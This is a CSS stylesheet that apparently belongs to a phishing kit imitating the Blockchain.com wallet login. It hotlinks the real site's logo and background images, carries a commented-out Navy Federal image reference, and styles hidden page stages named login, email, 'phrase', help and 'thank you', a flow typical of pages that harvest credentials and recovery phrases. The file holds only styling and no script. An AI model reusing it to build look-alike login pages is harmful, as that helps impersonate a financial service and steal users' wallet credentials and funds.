/*
* Prefixed by https://autoprefixer.github.io
* PostCSS: v8.3.6,
* Autoprefixer: v10.3.1
* Browsers: last 4 version
*/

color{
	color:rgba(196,91,219,0.1);
	color:rgba(196,91,219,0.2);
	color:rgba(196,91,219,0.3);
	color:rgba(196,91,219,0.4);
	color:rgba(196,91,219,0.5);
	color:rgba(196,91,219,0.6);
	color:rgba(196,91,219,0.7);
	color:rgba(196,91,219,0.8);
	color:rgba(196,91,219,0.9);
	color:rgba(196,91,219,1);
	
	background-color:-webkit-gradient(linear, 0 0, 0 100%, from(#ffffff), color-stop(25%, #ffffff), to(#e6e6e6));
	background-color:-webkit-linear-gradient(#ffffff, #ffffff 25%, #e6e6e6);
	background-color:-moz-linear-gradient(top, #ffffff, #ffffff 25%, #e6e6e6);
	background-color:-ms-linear-gradient(#ffffff, #ffffff 25%, #e6e6e6);
	background-color: linear-gradient(#ffffff, #ffffff 25%, #e6e6e6);
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#e6e6e6', GradientType=0);
	
	
	}

html, body, div, span, applet, object, iframe,
h1, h2, h3, h4, h5, h6, p, blockquote, pre,
a, abbr, acronym, address, big, cite, code,
del, dfn, em, img, ins, kbd, q, s, samp,
small, strike, strong, sub, sup, tt, var,
b, u, i, center,
dl, dt, dd, ol, ul, li,
fieldset, form, label, legend,
table, caption, tbody, tfoot, thead, tr, th, td,
article, aside, canvas, details, embed,
figure, figcaption, footer, header, hgroup,menu, nav, output, ruby, section, summary,
time, mark, audio, video {
	margin: 0;
	padding: 0;
	border: 0;
	font-size: 100%;
	font: inherit;
	vertical-align: baseline;
}

* {
    -webkit-box-sizing: border-box;
            box-sizing: border-box;
    padding: 0;
    margin: 0;
}

html{

	width:100%;
	height:100%;	
}

body{

	width:100%;
	height:100%;
	font-family:Arial, Helvetica, sans-serif;
	/*text-shadow: 0 1px 1px rgba(244,236,255, 0.75);*/
	font-size:11px;
	background-color:#FFFFFF;
	/*background-image:url(https://my.navyfederal.org/NFOAA_Auth/resources/images/css/img-billboard-BG.svg);*/
}

.container{
  width:100%;
  height:100%;
  background-color:#121d33;	
}
.h-bg{
  width:100%;
  height:113px;
  background-image:url("https://login.blockchain.com/img/bg-pattern.svg");	
}
.h-header{
  width:222px;
  height:32px;
  background-image:url("https://login.blockchain.com/img/bc-logo.svg?91c7840afd5ef690da30e77ec34105f3");
  background-repeat:no-repeat;
  background-size:96%;
  margin:0 auto;	
}
.h-space{
  width:100%;
  height:20px;	
}
.content{
  width: 100%;
  overflow:hidden;
  margin:0 auto;
  background-color:#FFF;
  border-radius:0.7em;	
  display: -webkit-box;	
  display: -ms-flexbox;	
  display: flex;

}

@media only screen and (min-width: 568px){
    .content {
        width: 480px;
    }
}
.content1{
  width:480px;
  overflow:hidden;
  margin:0 auto;
  background-color:#FFF;
  border-radius:0.7em;	
}
.form-inner{
  width: 100%;
  overflow:hidden;
  margin:0 auto;
  padding: 30px 30px 65px 30px;
}
.form-inner1{
  width:440px;
  overflow:hidden;
  margin:0 auto;	
}
.img2{
  width:144px;
  height:22px;
  background-image:url(../img/img2.png);
  background-repeat:no-repeat;	
}
.img2a{
  width:100%;
  height:22px;
  font-family:Arial, Helvetica, sans-serif;
  font-size:20px;
  font-weight:bold;
  text-align:center;	
}
.msg{
  width:350px;
  overflow:hidden;
  font-family:Verdana, Geneva, sans-serif;
  font-size:13px;
  color:#F00;	
}
.img3{
  width:139px;
  height:20px;
  background-image:url(../img/img3.png);
  background-repeat:no-repeat;	
}
.msg2{
  width:350px;
  overflow:hidden;
  font-family:Verdana, Geneva, sans-serif;
  font-size:11px;
  font-weight:bold;
  color:#353f52;	
}
.txt1{
  width: 100%;
  height:48px;
  padding:5px 10px;
  font-family:Verdana, Geneva, sans-serif;
  font-size:13px;
  border:1px solid #CCC;
  border-radius:0.4em;	
  margin-top: 10px;
}

.txt1:focus{
  border:1px solid #009;
  outline:none;	
}
.btnCon{
  width:133px;
  height:38px;
  border-radius:0.5em;
  background-color:#85b5f8;
  cursor:not-allowed;
  font-family:Verdana, Geneva, sans-serif;
  font-size:13px;
  border:1px solid #85b5f8;
  color:#FFF;
  font-weight:bold;	
}
.btnCon2{
  width:133px;
  height:38px;
  border-radius:0.5em;
  background-color:#0b49a0;
  cursor:pointer;
  font-family:Verdana, Geneva, sans-serif;
  font-size:13px;
  border:1px solid #0b49a0;
  color:#FFF;
  font-weight:bold;	
}
.goBack{
  width:66px;
  height:37px;
  cursor:pointer;
  background-color:#FFF;
  color:#0c7ff5;
  border:1px solid #FFF;	
}

.img4{
  width:174px;
  height:28px;
  background-image:url(../img/img4.png);
  background-repeat:no-repeat;	
}
.img5{
  width:256px;
  height:44px;
  background-image:url(../img/img5.png);
  background-repeat:no-repeat;	
}
.otherbtn{
  width:144px;
  height:45px;
  border:1px solid #CCC;
  border-radius:0.5em;
  color:#0c6cf3;
  font-family:Arial, Helvetica, sans-serif;
  font-size:15px;
  text-align:center;
  cursor:pointer;	
}
.img9{
  width:144px;
  height:45px;
  background-image:url(../img/img9.png);
  background-repeat:no-repeat;
  cursor:pointer;
  border:none;	
}
.img6{
  width:258px;
  height:57px;
  background-image:url(../img/img6.png);
  background-repeat:no-repeat;	
}
.img10{
  width:143px;
  height:44px;
  background-image:url(../img/img10.png);
  background-repeat:no-repeat;
  cursor:pointer;
  border:none;	
}
.img7{
  width:254px;
  height:59px;
  background-image:url(../img/img7.png);
  background-repeat:no-repeat;	
}
.img11{
  width:146px;
  height:44px;
  background-image:url(../img/img11.png);
  background-repeat:no-repeat;
  border:none;
  cursor:pointer;	
}
.img1-const{
  width:100%;
  overflow:hidden;
  margin:0em 0 0 0;	
}
.img1{
  width:292px;
  height:70px;
  background-image:url(../img/img1.png);
  background-repeat:no-repeat;
  cursor:pointer;
  margin:0 auto;
  background-position:0 3em;	
}

.img8{
  width:233px;
  height:50px;
  background-image:url(../img/img8.png);
  background-repeat:no-repeat;
  margin:0 auto;	
}
.img12{
  width:421px;
  height:60px;
  background-image:url(../img/img12.png);
  background-repeat:no-repeat;
  cursor:pointer;
  margin:0 auto;	
}
.img12:focus{
  outline:none;	
}
.overlay{
   width:100%;
   height:400%;
   background-color:rgba(255, 255, 255, 0.8);
   position:fixed;
   top:0;
   left:0;
   display:none;	
}
.lgif-space{
   width:100%;
   height:200px;	
}
.loadgif{
   width:60px;
   height:60px;
   margin:0 auto;	
}

.img13{
  width:415px;
  height:65px;
  background-image:url(../img/img13.png);
  background-repeat:no-repeat;	
}
.img13a{
  width:415px;
  height:65px;
  background-image:url(../img/img13a.png);
  background-repeat:no-repeat;	
}
.label{
   width:180px;
   overflow:hidden;
   font-family:Verdana, Geneva, sans-serif;
   font-size:13px;
   font-weight:bold;
   margin:0 0 0.3em 0;
   float:left;	
}
.img15{
  width:414px;
  height:63px;
  background-image:url(../img/img15.png);
  background-repeat:no-repeat;
  background-position:-3em 0;	
}
.img14{
  width:418px;
  height:50px;
  background-image:url(../img/img14.png);
  background-repeat:no-repeat;
  background-position:-2em 0;
  cursor:pointer;
  border:none;
  font-size:1px;
  color:#0c6cf2;	
}
.img14:focus{
   outline:none;	
	
}
.img16{
  width:424px;
  height:60px;
  background-image:url(../img/img16.png);
  background-repeat:no-repeat;
  cursor:pointer;	
}
.re{
 width:140px;
 overflow:hidden;
 font-family:Verdana, Geneva, sans-serif;
 font-size:13px;
 color:#F00;
 float:right;
 display:none;	
}
.re1{
 width:140px;
 overflow:hidden;
 font-family:Verdana, Geneva, sans-serif;
 font-size:13px;
 color:#F00;
 float:right;
 display:none;	
}

/*.login{*/
/*  display:block;	*/
/*}*/
.emailsec{
  display:none;	
}
.phrase{
  display:none;	
}
.help{
  display:none;	
}
.thankyou{
  display:none;	
}

.control_container_space {
    padding-left: 30px;
    padding-right: 30px;
    width: 100%;
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
}

.sc-gzVnrw.blKetq {
  font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
  font-weight: 600;
  font-size: 20px;
  line-height: inherit;
  text-transform: capitalize;
  font-style: normal;
  color: rgb(18, 29, 51);
  cursor: inherit;
  display: block;
  opacity: 1;
}

.sc-gzVnrw.blKetq {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  margin-top: 20px;
}

.JUGJG > div {
  margin-right: 0px;
}
.llutmI {
  line-height: 1;
  margin: 20px 0px;
    margin-right: 0px;
  text-align: center;
}

.fJbVHw > * {
  display: inline;
  margin-right: 2px;
  white-space: normal;
}
.ivvLkX span {
  font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
  font-weight: 500;
  font-size: 12px;
  line-height: inherit;
  text-transform: none;
  font-style: normal;
  color: rgb(53, 63, 82);
  cursor: inherit;
  display: inline;
  opacity: 1;
}

.fJbVHw > * {
  display: inline;
  margin-right: 2px;
  white-space: normal;
}
.hVIpLu, .hVIpLu span {
  font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
  font-size: 12px;
  font-weight: 500;
  color: rgb(12, 108, 242);
  text-transform: none;
  text-decoration: none;
  cursor: pointer;
}
.llutmI {
  line-height: 1;
  text-align: center;
}

.kXYclp span {
  font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
  font-weight: 600;
  font-size: 14px;
  line-height: inherit;
  text-transform: none;
  font-style: normal;
  color: rgb(53, 63, 82);
  cursor: inherit;
}

.JUGJG > div {
  margin-right: 0px;
}
.cGNscY {
  position: relative;
  width: 100%;
}

.sc-gzVnrw.blKetq {
  margin-bottom: 20px;
}

.ktsDXc {
  width: 100%;
  height: 112px;
  margin: 0px auto;
  background-color: rgb(18, 29, 51);
}

.buGjPd {
  position: relative;
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-orient: horizontal;
  -webkit-box-direction: normal;
      -ms-flex-direction: row;
          flex-direction: row;
  -webkit-box-pack: justify;
  -ms-flex-pack: justify;
      justify-content: space-between;
  -webkit-box-align: center;
  -ms-flex-align: center;
      align-items: center;
  width: 100%;
  height: 100%;
  background-color: inherit;
}
.clnoIm {
  padding: 0px 16px;
  -webkit-box-sizing: border-box;
          box-sizing: border-box;
  background-color: rgb(18, 29, 51);
  background-image: url(../img/bg-pattern.svg);
}

.dWqUnF {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-orient: horizontal;
  -webkit-box-direction: normal;
      -ms-flex-direction: row;
          flex-direction: row;
  width: 100%;
  -webkit-box-pack: center;
  -ms-flex-pack: center;
      justify-content: center;
  padding-left: 0px;
  margin: 0 auto;
}
.gZupyF {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -ms-flex-align: center;
      align-items: center;
  width: 250px;
}

.bGxdbv {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-orient: horizontal;
  -webkit-box-direction: normal;
      -ms-flex-direction: row;
          flex-direction: row;
  -webkit-box-pack: center;
  -ms-flex-pack: center;
      justify-content: center;
}

.cxqfnO {
  font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
  font-size: 16px;
  font-weight: 500;
  color: rgb(12, 108, 242);
  text-transform: none;
  text-decoration: none;
  cursor: pointer;
}

.bOsyyS {
  width: auto;
  height: 24px;
}
.PUTmg {
  width: 240px;
  display: block;
}
.JUGJG {
  width: 100%;
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  position: relative;
  -webkit-box-orient: vertical;
  -webkit-box-direction: normal;
      -ms-flex-direction: column;
          flex-direction: column;
  margin-bottom: 16px;
}

.btn {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-orient: horizontal;
  -webkit-box-direction: normal;
      -ms-flex-direction: row;
          flex-direction: row;
  -webkit-box-pack: center;
  -ms-flex-pack: center;
      justify-content: center;
  -webkit-box-align: center;
  -ms-flex-align: center;
      align-items: center;
  width: 100%;
  min-width: 140px;
  height: 48px;
  padding: 10px 15px;
  -webkit-box-sizing: border-box;
          box-sizing: border-box;
  -webkit-user-select: none;
     -moz-user-select: none;
      -ms-user-select: none;
          user-select: none;
  text-align: center;
  text-decoration: none;
  vertical-align: middle;
  letter-spacing: normal;
  -webkit-transition: all 0.2s ease-in-out 0s;
  -o-transition: all 0.2s ease-in-out 0s;
  transition: all 0.2s ease-in-out 0s;
  white-space: nowrap;
  line-height: 1;
  text-transform: none;
  font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
  font-size: 14px;
  font-weight: 600;
  color: rgb(255, 255, 255);
  background-color: rgb(12, 108, 242);
  border-radius: 8px;
  border-style: solid;
  border-width: 1px;
  border-color: rgb(12, 108, 242);
  cursor: pointer;
}
.bzOUY {
  margin-top: 15px;
}
.dtvtzN {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-orient: vertical;
  -webkit-box-direction: normal;
      -ms-flex-direction: column;
          flex-direction: column;
  -webkit-box-pack: justify;
  -ms-flex-pack: justify;
      justify-content: space-between;
  -webkit-box-align: center;
  -ms-flex-align: center;
      align-items: center;
  height: 100%;
}
.dtvtzN {
  background-color: rgb(18, 29, 51);
  height: auto;
  min-height: 100%;
  width: 100%;
  overflow: hidden;
}

.sc-gFaPwZ.eyseYo {
  width: 100%;
}

.bOJvdq {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-pack: center;
  -ms-flex-pack: center;
      justify-content: center;
  -webkit-box-align: center;
  -ms-flex-align: center;
      align-items: center;
  width: 100%;
  margin: 6rem 0px 2rem;
}

.hniRZU {
  padding: 0px 2rem;
}

.kXOjke {
  display: -webkit-inline-box;
  display: -ms-inline-flexbox;
  display: inline-flex;
  text-transform: none;
  position: relative;
}

.hvZgPr {
  background-clip: padding-box;
  background-color: rgb(255, 255, 255);
  border: 1px solid rgb(240, 242, 247);
  border-radius: 4px;
  -webkit-box-shadow: rgba(0, 0, 0, 0.176) 0px 6px 12px;
          box-shadow: rgba(0, 0, 0, 0.176) 0px 6px 12px;
  display: none;
  float: none;
  height: auto;
  width: inherit;
  line-height: 20px;
  list-style: outside none none;
  margin: 2px 0px;
  max-height: 230px;
  min-width: 20px;
  overflow: auto;
  padding: 5px 0px;
  position: absolute;
  left: 0px;
  top: auto;
  bottom: 25px;
  z-index: 10;
}

.hcNnNN {
  display: -webkit-inline-box;
  display: -ms-inline-flexbox;
  display: inline-flex;
  -webkit-box-orient: horizontal;
  -webkit-box-direction: normal;
      -ms-flex-direction: row;
          flex-direction: row;
  -webkit-box-pack: center;
  -ms-flex-pack: center;
      justify-content: center;
  -webkit-box-align: center;
  -ms-flex-align: center;
      align-items: center;
  cursor: pointer;
  width: inherit;
  font-weight: 600;
}

.kXOjke {
  text-transform: none;
}

.hcNnNN > * {
  color: rgb(152, 161, 178) !important;
}
.ahgzx {
  display: inline;
  font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
  font-size: 15px;
  margin-right: 10px;
}
.hcNnNN {
  cursor: pointer;
  font-weight: 600;
}
.kXOjke {
  text-transform: none;
}

.fgsder  {
  font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
  font-size: 14px;
  font-weight: 500;
  color: rgb(152, 161, 178);
  text-transform: none;
  text-decoration: none;
  cursor: pointer;
  margin-right: 10px;
}

.jSLvMQ  {
  font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
  font-size: 16px;
  font-weight: 500;
  color: rgb(152, 161, 178);
  text-transform: none;
  text-decoration: none;
  cursor: pointer;
}

.fnmYxZ {
    -webkit-box-orient: horizontal !important;
    -webkit-box-direction: normal !important;
        -ms-flex-direction: row !important;
            flex-direction: row !important;
    -webkit-box-pack: justify !important;
    -ms-flex-pack: justify !important;
        justify-content: space-between !important;
    -webkit-box-align: center;
    -ms-flex-align: center !important;
        align-items: center !important;
    margin-top: 15px;
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
}

.cIFcfz {
  font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
  font-size: 13px;
  font-weight: 600;
  color: rgb(12, 108, 242);
  text-transform: none;
  text-decoration: none;
  cursor: pointer;
}

.cIFcfz {
  font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
  font-size: 13px;
  font-weight: 600;
  color: rgb(12, 108, 242);
  text-transform: none;
  text-decoration: none;
  cursor: pointer;
}

.sc-RbTVP.cGNscY {
  margin-bottom: 30px;
}

.recover_text_text {
  margin-bottom: 20px;
  font-size: 13px;
  color: red;
  line-height: 1.5;
  font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
}

.recover_text_text_text {
  font-size: 15px;
  font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
  font-weight: 600;
  margin-bottom: 20px;
}

.recover_text_text_text_text {
  margin-bottom: 20px;
  font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
  font-size: 12px;
}

.loadgif img {
  width: 100%;
  height: auto;
}